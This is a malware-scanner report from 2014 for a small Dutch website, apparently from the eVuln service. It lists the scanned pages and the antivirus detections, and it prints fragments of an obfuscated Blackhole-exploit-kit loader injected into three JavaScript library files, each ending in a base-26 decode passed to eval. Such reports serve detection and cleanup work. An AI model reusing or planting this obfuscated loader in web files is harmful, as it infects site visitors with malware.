New scan:

Malware Scanner report for prospero-knowledge.nl

Malicious/Suspicious/Total urls checked
3/0/17
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "prospero-knowledge.nl" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=prospero-knowledge.nl

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://prospero-knowledge.nl/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://prospero-knowledge.nl/
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 08:03:17 GMT
Accept-Ranges: bytes
ETag: "baafbe55cdddce1:2b8143"
Server: Microsoft-IIS/6.0
Content-Length: 366
Content-Location: http://prospero-knowledge.nl/index.html
Content-Type: text/html
Last-Modified: Sun, 10 Nov 2013 04:28:41 GMT
X-Powered-By: ASP.NET
clean
http://prospero-knowledge.nl/index.html
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 08:03:17 GMT
Accept-Ranges: bytes
ETag: "baafbe55cdddce1:2b8143"
Server: Microsoft-IIS/6.0
Content-Length: 366
Content-Type: text/html
Last-Modified: Sun, 10 Nov 2013 04:28:41 GMT
X-Powered-By: ASP.NET
clean
http://www.prospero-knowledge.nl/starklasse/index.php
200 OK
Content-Length: 15577
Content-Type: text/html
clean
http://www.prospero-knowledge.nl/starklasse/media/system/js/caption.js
200 OK
Content-Length: 1721
Content-Type: application/x-javascript
clean
http://www.prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.script.js
200 OK
Content-Length: 3207
Content-Type: application/x-javascript
clean
http://www.prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.rightcol.js
200 OK
Content-Length: 1600
Content-Type: application/x-javascript
clean
http://www.prospero-knowledge.nl/starklasse/js/prototype.js
200 OK
Content-Length: 133484
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



var Prototype = {
Version: '1.6.0.2',

Browser: {
IE: !!(window.attachEvent && !window.opera),
Opera: !!window.opera,
WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1,
Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1,
MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/)
},

BrowserFeatures: {
XPath:
... 3348 bytes are skipped ...
","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3n","3m","3l","4c","4a","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3n","3m","3l","4c","4a","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-506!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}

Antivirus reports:

AntiVir
JS/Agent.axqoua
Avast
JS:Includer-BAU [Trj]
Ad-Aware
JS:Exploit.BlackHole.KP
Ikarus
Trojan.Script
nProtect
JS:Exploit.BlackHole.KP
K7AntiVirus
Exploit ( 04c552e31 )
TrendMicro-HouseCall
JS_BLACOLE.SMAP
Emsisoft
JS:Exploit.BlackHole.KP (B)
Comodo
TrojWare.JS.Blacole.YA
K7GW
Exploit ( 04c552e31 )
TrendMicro
JS_BLACOLE.SMAP
Microsoft
Trojan:JS/BlacoleRef.CM
Kaspersky
Trojan-Downloader.JS.Agent.gvn
MicroWorld-eScan
JS:Exploit.BlackHole.KP
Fortinet
JS/Blacole.HT!exploit
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Blackhole.bekghp
F-Secure
JS:Exploit.BlackHole.KP
VIPRE
Trojan.JS.BlacoleRef.cm (v)
AVG
HTML/Framer
GData
JS:Exploit.BlackHole.KP
AVware
Trojan.JS.BlacoleRef.cm (v)
BitDefender
JS:Exploit.BlackHole.KP

http://www.prospero-knowledge.nl/starklasse/js/scriptaculous.js?load=effects,builder
200 OK
Content-Length: 5843
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



var Scriptaculous = {
Version: '1.8.1',
require: function(libraryName) {
document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>');
},
REQUIRED_PROTOTYPE: '1.6.0',
load: function() {
function convertVersionString(versionString){
var r = versionString.split('.');
return parseInt(r[0])*100000 + parseInt(r[1])*1000 + parseInt(r[2]);
}

if((typeof Pro
... 3601 bytes are skipped ...
","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3n","3m","3l","4c","4a","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3n","3m","3l","4c","4a","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-506!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}

Antivirus reports:

AntiVir
JS/Agent.axqoua
Avast
JS:Includer-BAU [Trj]
Ad-Aware
JS:Exploit.BlackHole.KP
Ikarus
Trojan.Script
nProtect
JS:Exploit.BlackHole.KP
K7AntiVirus
Exploit ( 04c552e31 )
TrendMicro-HouseCall
JS_BLACOLE.SMAP
Emsisoft
JS:Exploit.BlackHole.KP (B)
Comodo
TrojWare.JS.Blacole.YA
K7GW
Exploit ( 04c552e31 )
TrendMicro
JS_BLACOLE.SMAP
Microsoft
Trojan:JS/BlacoleRef.CM
Kaspersky
Trojan-Downloader.JS.Agent.gvn
MicroWorld-eScan
JS:Exploit.BlackHole.KP
Fortinet
JS/Blacole.HT!exploit
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Blackhole.bekghp
F-Secure
JS:Exploit.BlackHole.KP
VIPRE
Trojan.JS.BlacoleRef.cm (v)
F-Prot
JS/IFrame.UJ!Eldorado
AVG
HTML/Framer
GData
JS:Exploit.BlackHole.KP
Commtouch
JS/IFrame.UJ!Eldorado
AVware
Trojan.JS.BlacoleRef.cm (v)
BitDefender
JS:Exploit.BlackHole.KP

http://www.prospero-knowledge.nl/starklasse/js/lightbox.js
200 OK
Content-Length: 22017
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



LightboxOptions = Object.extend({
fileLoadingImage: 'images/loading.gif',
fileBottomNavCloseImage: 'images/closelabel.gif',

overlayOpacity: 0.8,
animate: true, resizeSpeed: 7,
borderSize: 10,
labelImage: "Image",
labelOf: "of"
}, window.LightboxOptions || {});


var Lightbox = Class.create();

Lightbox.prototype = {
imageArray: [],

... 3202 bytes are skipped ...
","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3n","3m","3l","4c","4a","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3n","3m","3l","4c","4a","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-506!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}

Antivirus reports:

AntiVir
JS/Agent.axqoua
Avast
JS:Includer-BAU [Trj]
Ad-Aware
JS:Exploit.BlackHole.KP
Ikarus
Trojan.Script
nProtect
JS:Exploit.BlackHole.KP
K7AntiVirus
Exploit ( 04c552e31 )
TrendMicro-HouseCall
JS_BLACOLE.SMAP
Emsisoft
JS:Exploit.BlackHole.KP (B)
Comodo
TrojWare.JS.Blacole.YA
K7GW
Exploit ( 04c552e31 )
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
JS_BLACOLE.SMAP
Microsoft
Trojan:JS/BlacoleRef.CM
Kaspersky
HEUR:Trojan.Script.Iframer
MicroWorld-eScan
JS:Exploit.BlackHole.KP
Fortinet
JS/Blacole.HT!exploit
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Blackhole.bekghp
F-Secure
JS:Exploit.BlackHole.KP
VIPRE
Trojan.JS.BlacoleRef.cm (v)
F-Prot
JS/IFrame.UJ!Eldorado
AVG
HTML/Framer
Norman
Blacole.WD
GData
JS:Exploit.BlackHole.KP
Commtouch
JS/IFrame.UJ!Eldorado
AVware
Trojan.JS.BlacoleRef.cm (v)
BitDefender
JS:Exploit.BlackHole.KP

http://prospero-knowledge.nl/starklasse/index.php
200 OK
Content-Length: 15497
Content-Type: text/html
clean
http://prospero-knowledge.nl/starklasse/media/system/js/caption.js
200 OK
Content-Length: 1721
Content-Type: application/x-javascript
clean
http://prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.script.js
200 OK
Content-Length: 3207
Content-Type: application/x-javascript
clean
http://prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.rightcol.js
200 OK
Content-Length: 1600
Content-Type: application/x-javascript
clean
http://prospero-knowledge.nl/starklasse/
200 OK
Content-Length: 15488
Content-Type: text/html
clean
http://prospero-knowledge.nl/starklasse/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL3Byb3NwZXJvLWtub3dsZWRnZS5ubC9zdGFya2xhc3NlL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTgwOndlZHN0cmlqZGthbGVuZGVyLTIwMTM=
200 OK
Content-Length: 2727
Content-Type: text/html
clean
http://prospero-knowledge.nl/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://prospero-knowledge.nl/starklasse/index.php?view=article&id=80:wedstrijdkalender-2013&tmpl=component&print=1&layout=default&page=
200 OK
Content-Length: 1874
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: prospero-knowledge.nl

Result:
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 08:03:17 GMT
Accept-Ranges: bytes
ETag: "baafbe55cdddce1:2b8143"
Server: Microsoft-IIS/6.0
Content-Length: 366
Content-Location: http://prospero-knowledge.nl/index.html
Content-Type: text/html
Last-Modified: Sun, 10 Nov 2013 04:28:41 GMT
X-Powered-By: ASP.NET

...366 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: prospero-knowledge.nl
Referer: http://www.google.com/search?q=prospero-knowledge.nl

Result:
The result is similar to the first query. There are no suspicious redirects found.